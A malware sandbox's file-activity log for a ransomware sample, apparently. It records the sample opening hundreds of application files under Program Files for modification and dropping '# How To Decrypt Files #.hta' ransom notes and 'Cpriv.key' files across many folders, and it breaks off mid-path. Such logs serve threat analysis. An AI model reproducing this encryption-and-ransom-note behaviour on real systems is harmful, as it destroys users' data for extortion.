de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\OLJRNL.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\SUBMIT.JS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PROOF\3082\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.CGM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB3B.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\OFFISUPP.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\on_desktop\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\userContent_16x9_imagemask.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\BORDERS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14832_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00414_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BS4BOXES.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-search.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLJRNLR.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL102.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01080_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107344.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\12.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105336.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\VCTRN_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\J0115856.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\he\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD10890_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0233665.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.VN.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01682_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGBOXES.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_output\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\PROFILE\PROFILE.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\ko.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR8B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\performance.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00177_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsBrowserUpgrade.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\WPGIMP32.FLT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.SF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansDemiBold.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGACCBAR.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GR8GALRY.GRA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21302_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKDECL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\MSBuild\Microsoft\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02055_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198102.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18203_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\POWERPNT.DEV_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\OliveGreen.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Word.en-us\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows NT\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\add_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\PipelineSegments.store de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0286068.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18228_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292248.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ACCWIZ\ACWZLIB.ACCDE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03331_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\security\local_policy.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsHomePageStyle.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\NEWS11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\POSTCARD.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Star_Half.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\InfoPath.en-us de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14866_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-core.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02120_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14869_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\CGMIMP32.FLT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\settings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_hover.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\39.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00985_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGLINACC.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\SegoeChess.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR32F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_pressed.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\es.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Black Tie.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152702.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00257_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02407_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR1B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL058.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\5.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Document.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program 